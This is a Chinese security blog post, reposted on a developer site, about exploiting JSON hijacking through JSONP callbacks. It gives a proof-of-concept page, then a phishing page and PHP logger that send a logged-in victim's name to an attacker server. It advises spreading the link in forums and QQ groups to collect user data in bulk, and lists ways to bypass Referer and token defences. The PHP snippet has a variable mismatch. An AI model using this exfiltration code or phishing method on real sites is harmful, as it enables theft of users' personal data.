内容简介:JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:
前言
JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。
0×01漏洞的挖掘
一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:
我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。
0×02漏洞的证明之poc
提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。
假如返回的数据为:
txf({“data”:{“name”:”唐晓峰”}});
<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>
<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>
即可如下弹窗:
0×03漏洞的利用之钓鱼
1.准备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
<?php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "名字: ".$name."\r\n");
?><html>
钓鱼.html
<head>
<title>txf</title>
<script>
var xmlhttp;
function txf(a)
{
xmlhttp=new XMLHttpRequest()
var x="http://***.***.***/json.php?name="+a.data.name;
xmlhttp.open("GET", x, true);
xmlhttp.send();
}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
<textarea>钓鱼啦,傻瓜</textarea>>
</body>
</html>
把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。
这边以hackone的一个项目为例:
0×04漏洞的修复与绕过
因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2. 增加token认证
token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过
3.接口禁用
无敌的操作,无法绕过
总结:
非常有意思的一个劫持,以前没有利用过,只是知道有这么个东西,一般众测或者项目上遇到我都是直接截图,申明一波敏感信息泄露,然后就结束了,很低危,这次实战利用之后,稍微提高了一点逼格。
*本文作者:zhukaiang7,转载请注明来自FreeBuf.COM
以上所述就是小编给大家介绍的《小学生都会挖掘的JSON Hijacking实战利用》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 小学生都能看懂——深度学习
- 开源小学生口算题生成程序发布 1.1 版本
- 快速上手Aws Lambda:有了serverless,小学生也能写后端
- 「Flask实战」鱼书项目实战一
- 「Flask实战」鱼书项目实战三
- 「Flask实战」鱼书项目实战四
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Domain-Driven Design
Eric Evans / Addison-Wesley Professional / 2003-8-30 / USD 74.99
"Eric Evans has written a fantastic book on how you can make the design of your software match your mental model of the problem domain you are addressing. "His book is very compatible with XP. It is n......一起来看看 《Domain-Driven Design》 这本书的介绍吧!